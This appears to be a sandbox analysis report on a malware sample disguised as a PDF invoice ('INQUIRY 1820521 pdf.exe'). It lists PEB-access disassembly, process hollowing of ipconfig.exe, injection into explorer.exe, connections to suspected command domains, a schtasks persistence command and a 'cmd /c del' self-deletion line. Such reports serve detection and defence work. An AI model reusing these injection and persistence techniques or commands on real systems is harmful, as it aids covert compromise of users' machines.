          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03275210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0332B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0332B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03348A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03304257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03287E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03340EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0330FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03348ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0332FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03348D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03294120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03294120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03297D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_033405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_033405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03328DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_033041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032ABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03344015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03344015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03332073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03341074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0329746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0330C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0330C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_032AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03290050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.hhcuerkn.com
          Source: C:\Windows\explorer.exe Network Connect: 210.152.87.233 80
          Source: C:\Windows\explorer.exe Network Connect: 104.21.82.58 80
          Source: C:\Windows\explorer.exe Domain query: www.xinghai-nb.com
          Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe Domain query: www.mobcitylabs.com
          Injects a PE file into foreign processes
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Memory written: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\ipconfig.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: B50000
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'
          Source: explorer.exe, 0000000A.00000000.683281450.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 0000000A.00000002.921124945.0000000005E50000.00000004.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000A.00000000.701814701.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe Queries volume information (VolumeInformation) on the following font files under C:\Windows\Fonts:
          arial.ttf, ariali.ttf, arialbd.ttf, arialbi.ttf, ARIALN.TTF, ariblk.ttf, ARIALNI.TTF, ARIALNB.TTF, ARIALNBI.TTF, bahnschrift.ttf,
          calibri.ttf, calibril.ttf, calibrii.ttf, calibrili.ttf, calibrib.ttf, calibriz.ttf, cambria.ttc, cambriai.ttf, cambriab.ttf, cambriaz.ttf,
          Candara.ttf, Candarai.ttf, Candarab.ttf, Candaraz.ttf, comic.ttf, comici.ttf, comicbd.ttf, comicz.ttf,
          consola.ttf, consolai.ttf, consolab.ttf, consolaz.ttf, constan.ttf, constani.ttf, constanb.ttf, constanz.ttf,
          corbel.ttf, corbeli.ttf, corbelb.ttf, corbelz.ttf, cour.ttf, couri.ttf, courbd.ttf, courbi.ttf, ebrima.ttf, ebrimabd.ttf,
          framd.ttf, FRADM.TTF, framdit.ttf, FRADMIT.TTF, FRAMDCN.TTF, FRADMCN.TTF, FRAHV.TTF, FRAHVIT.TTF,
          Gabriola.ttf, gadugi.ttf, gadugib.ttf, georgia.ttf, georgiai.ttf, georgiab.ttf, georgiaz.ttf, impact.ttf, Inkfree.ttf, javatext.ttf,
          LeelawUI.ttf, LeelUIsl.ttf, LeelaUIb.ttf, lucon.ttf, l_10646.ttf, malgun.ttf, malgunsl.ttf, malgunbd.ttf, himalaya.ttf,
          msjh.ttc, msjhl.ttc, msjhbd.ttc, ntailu.ttf, ntailub.ttf, phagspa.ttf, phagspab.ttf, micross.ttf, taile.ttf, taileb.ttf,
          msyh.ttc, msyhl.ttc, msyhbd.ttc, msyi.ttf, mingliub.ttc, monbaiti.ttf, msgothic.ttc, mvboli.ttf, mmrtext.ttf, mmrtextb.ttf,
          Nirmala.ttf, NirmalaS.ttf, NirmalaB.ttf, pala.ttf, palai.ttf, palab.ttf, palabi.ttf,
          segoepr.ttf, segoeprb.ttf, segoesc.ttf, segoescb.ttf, seguiemj.ttf, seguihis.ttf, seguisym.ttf, simsun.ttc, simsunb.ttf,
          Sitka.ttc, SitkaI.ttc, SitkaB.ttc, SitkaZ.ttc, sylfaen.ttf, symbol.ttf, tahoma.ttf, tahomabd.ttf,
          trebuc.ttf, trebucit.ttf, trebucbd.ttf, trebucbi.ttf, verdana.ttf, verdanai.ttf, verdanab.ttf, verdanaz.ttf, webdings.ttf, wingding.ttf,
